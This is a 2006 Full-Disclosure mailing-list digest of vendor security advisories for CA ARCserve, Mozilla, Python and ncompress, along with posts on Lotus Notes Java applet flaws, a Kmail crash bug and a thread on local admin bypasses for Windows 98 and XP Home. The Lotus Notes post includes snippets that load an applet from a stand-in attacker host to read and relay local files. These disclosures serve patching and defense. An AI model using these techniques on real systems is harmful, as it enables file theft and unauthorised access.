[Full-disclosure] [CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities

[Williams, James K]

Title: CAID 34693, 34694: CA BrightStor ARCserve Backup Multiple 
Buffer Overflow Vulnerabilities

CA Vulnerability ID (CAID): 34693, 34694

CA Advisory Date: 2006-10-05

Discovered By: TippingPoint, www.zerodayinitiative.com

Impact: Remote attacker can execute arbitrary code.

Summary: CA BrightStor ARCserve Backup contains multiple buffer 
overflow conditions that allow remote attackers to execute 
arbitrary code with local SYSTEM privileges on Windows. These 
issues affect the BrightStor Backup Agent Service, the Job Engine 
Service, and the Discovery Service in multiple BrightStor ARCserve 
Backup application agents and the Base product.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a High risk rating.

Affected Products:
BrightStor Products:
- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not 
  have this vulnerability)
- BrightStor ARCserve Backup r11.1
- BrightStor ARCserve Backup for Windows r11
- BrightStor Enterprise Backup 10.5
- BrightStor ARCserve Backup v9.01   
CA Protection Suites r2:
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business Server 
  Standard Edition r2
- CA Business Protection Suite for Microsoft Small Business Server 
  Premium Edition r2

Affected platforms:
Microsoft Windows

Status and Recommendation: 
Customers with vulnerable versions of the BrightStor ARCserve 
Backup products should upgrade to the latest versions which are 
available for download from http://supportconnect.ca.com.
Solution Document Reference APARs: 
QO82860, QO82863, QO82917, QO82856, QO82858

Determining if you are affected: 
For a list of updated files, and instructions on how to verify 
that the security update was fully applied, please review the 
Informational Solution referenced in the appropriate Solution 
Document.

References (URLs may wrap): 
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for this vulnerability:
Important Security Notice for BrightStor ARCserve Backup (Buffer 
Overrun)
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
Solution Document Reference APARs: 
QO82860, QO82863, QO82917, QO82856, QO82858
CA Security Advisor Research Blog posting:
http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=93686
CAID: 34693, 34694
CAID Advisory links: 
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34694
Discoverer: TippingPoint
http://www.tippingpoint.com/security/advisories/TSRT-06-11.html
http://www.tippingpoint.com/security/advisories/TSRT-06-12.html
http://www.zerodayinitiative.com/advisories/ZDI-06-030.html
http://www.zerodayinitiative.com/advisories/ZDI-06-031.html
CVE Reference: CVE-2006-5142, CVE-2006-5143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
OSVDB Reference: OSVDB ID: pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to [EMAIL PROTECTED], or utilize our "Submit a 
Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright © 2006 CA. All rights reserved.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1192-1] New Mozilla packages fix several vulnerabilities

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1192-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 6th, 2006   http://www.debian.org/security/faq
- --

Package: mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-2788 CVE-2006-4340 CVE-2006-4565 CVE-2006-4566
 CVE-2006-4568 CVE-2006-4570 CVE-2006-4571
BugTraq ID : 20042

Several security related problems have been discovered in Mozilla and
derived products.  The Common Vulnerabilities and Exposures project
identifies the following vulnerabilities:

CVE-2006-2788

Fernando Ribeiro discovered that a vulnerability in the getRawDER
functionallows remote attackers to cause a denial of service
(hang) and possibly execute arbitrary code.

CVE-2006-4340

Daniel Bleichenbacher recently described an implementation error
in RSA signature verification that cause the application to
incorrectly trust SSL certificates.

CVE-2006-4565, CVE-2006-4566

Priit Laes reported that that a JavaScript regular expression can
trigger a heap-based buffer overflow which allows remote attackers
to cause a denial of service and possibly execute arbitrary code.

CVE-2006-4568

A vulnerability has been discovered that allows remote attackers
to bypass the security model and inject content into the sub-frame
of another site.

CVE-2006-4570

Georgi Guninski demonstrated that even with JavaScript disabled in
mail (the default) an attacker can still execute JavaScript when a
mail message is viewed, replied to, or forwarded.

CVE-2006-4571

Multiple unspecified vulnerabilities in Firefox, Thunderbird and
SeaMonkey allow remote attackers to cause a denial of service,
corrupt memory, and possibly execute arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge7.3.1.

We recommend that you upgrade your Mozilla package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.3.1.dsc
  Size/MD5 checksum: 1131 d15b48d8e6d5bb470cffefdb98fd8c58

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.3.1.diff.gz
  Size/MD5 checksum:   565099 9539b911c438e419cee16fdce5ccebb1

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8.orig.tar.gz
  Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a

  Alpha architecture:


http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   168064 ebdd93280990a822fe619b20d2c5651b

http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   147992 527d6cfc2f148b2b57a5710e927d2f7d

http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   184944 6b61d08d769e011cbd2c90e8fb45c13b

http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   857794 f734aa2ccf548cd02f29c41af248191b

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum: 1038 03fa5f515ce9cf9ee8b6909112e67241

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum: 11492210 6370fe9a4502211f03d1c556db10a9a9

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   403278 be6c2e243d2690311b9ebd3f39d0699d

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   158336 6e0d851b64e2eef0a971ec836bf1d8be

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:  3358952 739167a1d53ef3fea8d48ac68a0ff985

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge7.3.1_alpha.deb
  Size/MD5 checksum:   122296 6fdf00b74974a4e264d5ad8cc211d10a

http://se

Re: [Full-disclosure] Removing the NIC cable = EoP?

[[EMAIL PROTECTED]]

*took out most of the text here*

As far as what this site is saying, it *CAN* work only if there is 
no security in place for the local box. And only on certain version of 
98 if i remember correctly. However, win 98 is full of holes, so there 
is not need to attack it at layer 1.

   If the boxes are moderen at all, they will run win xp or even better 
ubuntu or something of that sort. In XP mode, if they are using XP home 
and failed to setup an admin password, you can just go into safe mode as 
admin (no authentication required) and setup your local admin acct and 
go from there. XP pro won't let you do that. Ubuntu, well im not getting 
into that, but you can, and should, disable run level 1 at boot.

   Basicaly it boils down to this, could this have happened? Yes. If the 
admin has shit one clue could it happen? No. Start looking at layer 7 
again kids = /

Regards,
J

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Removing the NIC cable = EoP?

[Jessica Hope]

Lee Turner is correct, a default RM machine running Windows 98 (or
95...) will allow local admin if it can't reach the network. Since
such machines would be deployed in schools and sometimes by people who
do not know anything about what they are doing, this attack can work
rather well.

However, RM's defaults are worse than that, as all restrictions are
stored in the registry, so you can just as quickly unrestrict yourself
with modification of a few keys...

Jessica

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] JavaScript Spider (code that can traverse the web)

[pdp (architect)]

http://www.gnucitizen.org/projects/javascript-spider/

During the last couple of days I have been testing several attack
vectors to circumvent the browser security sandbox also known as the
same origin policy. There is a lot involved into this subject and I
will present my notes very soon.

The JavaScript Spider is the first implementation of a proof of
concept tool which shows that Javascript can be in fact quite
dangerous. This implementation depends on proxydrop.com but other
proxies are possible as well: Google Translate is one of them. Keep in
mind that the tool spiders only the first level.

The tool is located here:
http://www.gnucitizen.org/projects/javascript-spider/launch.htm

As you can see publicly available anonymizing proxies can be used to
fetch remote pages. This technique will work quite successfully on
Internet resources but not on Intranet. The reason for this is quite
obvious.

Suggestions and comments are greatly appreciated.

-- 
pdp (architect)
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-359-1] Python vulnerability

[Martin Pitt]

=== 
Ubuntu Security Notice USN-359-1   October 06, 2006
python2.3, python2.4 vulnerability
CVE-2006-4980
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  python2.32.3.5-2ubuntu0.3
  python2.4-minimal2.4.1-0ubuntu0.2

Ubuntu 5.10:
  python2.32.3.5-8ubuntu0.2
  python2.4-minimal2.4.2-1ubuntu0.2

Ubuntu 6.06 LTS:
  python2.3-dbg2.3.5-9ubuntu1.2
  python2.4-minimal2.4.3-0ubuntu6

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Benjamin C. Wiley Sittler discovered that Python's repr() function did
not properly handle UTF-32/UCS-4 strings. If an application uses
repr() on arbitrary untrusted data, this could be exploited to execute
arbitrary code with the privileges of the python application.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3_2.3.5-2ubuntu0.3.diff.gz
  Size/MD5:  2357500 bea365d1d6c98d54a2ba2c1300253cf9

http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3_2.3.5-2ubuntu0.3.dsc
  Size/MD5: 1152 b8b1b1a1ff18ddb962f059fe836bb370

http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3_2.3.5.orig.tar.gz
  Size/MD5:  8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.1-0ubuntu0.2.diff.gz
  Size/MD5:  2601919 042484bbb7dc5a2e03d6997de0f2a398

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.1-0ubuntu0.2.dsc
  Size/MD5: 1141 1bcd362ffbac62716bb34a1dd2f043b4

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.1.orig.tar.gz
  Size/MD5:  9205762 0475655d5c6f7919fc977c42c1103af8

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/p/python2.3/idle-python2.3_2.3.5-2ubuntu0.3_all.deb
  Size/MD5:   235652 3dfdb7ae46bc14c8742c8cf771fe0ecb

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.4/idle-python2.4_2.4.1-0ubuntu0.2_all.deb
  Size/MD5:   240584 809b8060bab7e3a588c48155fd412aee

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.3/python2.3-doc_2.3.5-2ubuntu0.3_all.deb
  Size/MD5:  2860646 45e662a6c0422763329dc381db1b899e

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.3/python2.3-examples_2.3.5-2ubuntu0.3_all.deb
  Size/MD5:   512962 19dd20632aa00a9d36958b3803129197

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-doc_2.4.1-0ubuntu0.2_all.deb
  Size/MD5:  3323478 7afd731df65520151337df8f1ca2bf9a

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-examples_2.4.1-0ubuntu0.2_all.deb
  Size/MD5:   579828 20a9f6a971ef3aa8d7618921bf296c5e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3-dev_2.3.5-2ubuntu0.3_amd64.deb
  Size/MD5:  1593658 e170994d3161032229e65c658c4b9833

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.3/python2.3-gdbm_2.3.5-2ubuntu0.3_amd64.deb
  Size/MD5:27142 951c53e20261acf2e2ba07317f40aaac

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.3/python2.3-mpz_2.3.5-2ubuntu0.3_amd64.deb
  Size/MD5:31942 9c4a3feae66a59b5de888d9fcfd35eeb

http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3-tk_2.3.5-2ubuntu0.3_amd64.deb
  Size/MD5:   109776 8e675863b272dc7955e3f374f85349bd

http://security.ubuntu.com/ubuntu/pool/main/p/python2.3/python2.3_2.3.5-2ubuntu0.3_amd64.deb
  Size/MD5:  3035892 4334bd09aee4dcc02d87dacd2d87d6d9

http://security.ubuntu.com/ubuntu/pool/universe/p/python2.4/python2.4-dbg_2.4.1-0ubuntu0.2_amd64.deb
  Size/MD5:  4285084 f0efd6ba55308df0c4dd901262fe6789

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.1-0ubuntu0.2_amd64.deb
  Size/MD5:  1682228 b5a23d40dc9b78aaae0c77911f74dfa7

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-gdbm_2.4.1-0ubuntu0.2_amd64.deb
  Size/MD5:28006 5abb3d105f9be8e876f1f4780450d08d

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.1-0ubuntu0.2_amd64.deb
  Size/MD5:   807100 9f3a8dce512745e3c0ed6e45066601e8

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-tk_2.4.1-0ubuntu0.2_amd64.deb
  Size/MD5:   111906 cb5f4ea87f55671f07169627df23bf50

http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4

[Full-disclosure] Details of Lotus Notes Java Applet vulnerabilities

[Jouko Pynnonen]

OVERVIEW


Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies,  etc. IBM estimates it is
used by 60 million people.

Out of academic interest, I'm posting some technical details of three
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during
July-August 2004 and a fix is available.



DETAILS
===

The vulnerabilities involve Java applets embedded in HTML formatted
e-mail messages. A  contributing factor in all of the issues is that
such Java applets are automatically displayed when the e-mail message
is viewed (unlike with most e-mail clients).



* Vulnerability 1: global file read access

An e-mail message containing a Java Applet with the codebase
"file:///" gains unlimited read access to local files when the e-mail
is viewed. An example HTML snippet follows:

  http://www.attacker.tld/applet.jar";
   width="1" height="1">

The applet's Java bytecode itself needn't be contained in the e-mail
but it's only referenced by the archive URL. The applet gets
automatically loaded when the e-mail is viewed. It has file read
access on the local system (can read whatever files the currently
logged in user can, and list hard drive contents). The applet can use
e.g. JavaScript to relay the files to the attacker.



* Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web
browser with the desired URL when an e-mail message is viewed. An
example piece of Java code to do this follows:

  public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html";);
  }

Under default settings, Internet Explorer is launched and the attacker
supplied URL is opened in it when the e-mail message is viewed. This
exposes the system to Internet Explorer vulnerabilities, greatly
widening the attack surface.



* Vulnerability 3: codebase buffer overflow

Opening an HTML e-mail message which contains an applet tag with a
long codebase parameter (over 500 bytes) causes an apparently
stack-based buffer overflow condition. It may be exploitable to run
arbitrary code on the victim system when the e-mail message is viewed.
This is an example piece of HTML to produce it:

 

Exploitability of this scenario was NOT confirmed.



WORKAROUND
==

Disabling Java applets can be used to protect from these
vulnerabilities. To disable Java applets, select File -> Preferences
-> User Preferences from the Notes client menu and uncheck the option
for "Enable Java applets."



SOLUTION


The issues have been addressed in Lotus Notes versions 6.5.4 and
6.0.5. For detailed fix information, see

http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en



CREDITS
===

The vulnerability was discovered and researched by Jouko Pynnönen,
Klikki Oy, Finland.



-- 
Jouko Pynnonen <[EMAIL PROTECTED]>
Klikki Oy
http://iki.fi/jouko

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200610-03 ] ncompress: Buffer Underflow

[Raphael Marichez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ncompress: Buffer Underflow
  Date: October 06, 2006
  Bugs: #141728
ID: 200610-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer underflow vulnerability has been reported in ncompress
allowing for the execution of arbitrary code.

Background
==

ncompress is a suite of utilities to create and extract
Lempel-Ziff-Welch (LZW) compressed archives.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  app-arch/ncompress  < 4.2.4.1  >= 4.2.4.1

Description
===

Tavis Ormandy of the Google Security Team discovered a static buffer
underflow in ncompress.

Impact
==

An attacker could create a specially crafted LZW archive, that when
decompressed by a user or automated system would result in the
execution of arbitrary code with the permissions of the user invoking
the utility.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ncompress users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-arch/ncompress-4.2.4.1"

References
==

  [ 1 ] CVE-2006-1168
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1168

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-03.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



pgpyxsnVh91Rp.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Removing the NIC cable = EoP?

[James (njan) Eaton-Lee]

Jessica Hope wrote:

> However, RM's defaults are worse than that, as all restrictions are
> stored in the registry, so you can just as quickly unrestrict yourself
> with modification of a few keys...

This is still specific to windows 98 - the registry is as secure-a place 
as any in Windows 2000 and above to store configuration on a 
workstation, where the registry is protectable, and system settings such 
as these can be (and are) locked down by a complex set of ACLs.

Without administrator credentials (or privilege escalation, unrestricted 
physical access to the machine, etc), it isn't terribly feasible for 
users to arbitrarily write to protected registry keys in 2000 and above.

Windows 98 was never designed to be locked down, and all of these 
problems are stemming from the (possibly inadequate) methods taken to 
lock down the operating system and make it participate in a network or 
domain in a manner in which it was never really designed for.

The newer versions of RM Connect, which is the package that this 
discussion is essentially about, are based on Active Directory with 
clients on the Windows 2000 and XP operating systems, and (as far as I'm 
aware) leverage the security mechanisms built into these platforms, with 
corresponding levels of security..

  - James.

-- 
   James (njan) Eaton-Lee | 10807960 | http://www.jeremiad.org
   Semper Monemus Sed Non Audiunt, Ergo Lartus - (Jean-Croix)

sites: https://www.bsrf.org.uk ~ http://www.security-forums.com
ca: https://www.cacert.org/index.php?id=3
-- 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Kmail <= 1.9.1 (latest) DOS

[nnp]

Found this while fuzzing for a different type of vuln. For the life of
me I cant do anything useful with this bug so here it is. I dont have
the time to narrow down what causes the crash, if anyone manages to
get code execution from it, be a dear and let me know ;)

I am using KDE 3.5.2 and kmail 1.9.1.

This bug requires HTML to be enabled (Settings -> Configure Kmail ->
Security -> and tick Prefer HTML to Plain Text.).

(email that causes crash) http://silenthack.co.uk/nnp/exploits/kmail/crashMail

When the mail is viewed it should crash immediately and give you a
stack trace similar to

(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
[KCrash handler]
#6  0xe410 in __kernel_vsyscall ()
#7  0xb787b9a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#8  0xb787d2b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#9  0xb7757cf9 in kdbgstream::flush () from /usr/lib/libkdecore.so.4
#10 0xb7bf7cda in endl () from /usr/lib/libkmailprivate.so
#11 0xb5be724e in KIO::Scheduler::_scheduleJob () from /usr/lib/libkio.so.4
#12 0xb6cdaa17 in khtml_jpeg_source_mgr::khtml_jpeg_source_mgr ()
  from /usr/lib/libkhtml.so.4
#13 0xb6cdad1a in khtml_jpeg_source_mgr::khtml_jpeg_source_mgr ()
  from /usr/lib/libkhtml.so.4
#14 0xb7117eb9 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#15 0xb7118954 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3
#16 0xb74ad39e in QTimer::timeout () from /usr/lib/libqt-mt.so.3
#17 0xb713ceb1 in QTimer::event () from /usr/lib/libqt-mt.so.3
#18 0xb70ade56 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3
#19 0xb70ae052 in QApplication::notify () from /usr/lib/libqt-mt.so.3
#20 0xb77abd7d in KApplication::notify () from /usr/lib/libkdecore.so.4
#21 0xb703f157 in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3
#22 0xb709f843 in QEventLoop::activateTimers () from /usr/lib/libqt-mt.so.3
#23 0xb7052f67 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3
#24 0xb70c6947 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3
#25 0xb70c686a in QEventLoop::exec () from /usr/lib/libqt-mt.so.3
#26 0xb70ac965 in QApplication::exec () from /usr/lib/libqt-mt.so.3
#27 0x0804a04b in ?? ()
#28 0xbfe80938 in ?? ()
#29 0xbfe80b24 in ?? ()
#30 0x in ?? ()

-- 
http://silenthack.co.uk
http://smashthestack.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Removing the NIC cable = EoP?

[Greg]

I don't really understand the fuss to be honest.

Eg, to do that you would have to be so lax in security that anyone who could
take an Ethernet cable out and put it in another computer would be able to
do that. This means that someone is bending over, unplugging, moving it the
required distance to another machine and plugging it in.

Hell, the well known and still existing Windows problem would be much
easieryou know the one yes? You have a networked machine that has a
password at keyboard level and a screen saver set to take it back to the
logon screen when inactive for "X" minutes. To get back in at keyboard level
for a non-hacker means knowing at least the password or possibly the
username and password depending on how it is set up. However, if the
keyboard user has already logged on then, say, gone to lunch and the machine
has defaulted to wanting you to logon, it retains its network capability.
Much easier for a pissed off employee to use that method to gain access than
being seen moving to that computer and back again. I have always maintained,
which some disagree with, that if the machine requires local user logon in
those circumstances, it also should be forced off the network. After all,
the machine that I discovered that had that problem was a payroll one and of
course anyone able to get in via the network could while normal users who
didn't know the password couldn't.

If anyone is interested, yes I sent that one in to MS quite some time back
just around when they released SP2 for XP. They said it would be an option
(you decide which way it behaves) next SP and/or Windows (eg, Vista). Don't
hold your breath on it happening.


> -Original Message-
> From: Jessica Hope [mailto:[EMAIL PROTECTED] 
> Sent: Friday, 6 October 2006 11:20 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Removing the NIC cable = EoP?
> 
> 
> Lee Turner is correct, a default RM machine running Windows 98 (or
> 95...) will allow local admin if it can't reach the network. 
> Since such machines would be deployed in schools and 
> sometimes by people who do not know anything about what they 
> are doing, this attack can work rather well.
> 
> However, RM's defaults are worse than that, as all 
> restrictions are stored in the registry, so you can just as 
> quickly unrestrict yourself with modification of a few keys...
> 
> Jessica
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/